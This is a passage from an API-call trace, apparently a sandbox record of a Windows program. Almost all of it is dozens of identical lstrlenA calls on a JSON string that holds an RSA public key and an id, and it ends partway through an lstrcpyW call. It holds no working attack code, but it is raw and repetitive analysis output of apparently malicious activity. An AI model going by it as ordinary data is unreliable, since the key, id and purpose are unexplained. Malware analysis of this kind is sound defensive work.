KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.404] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0172.405] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC 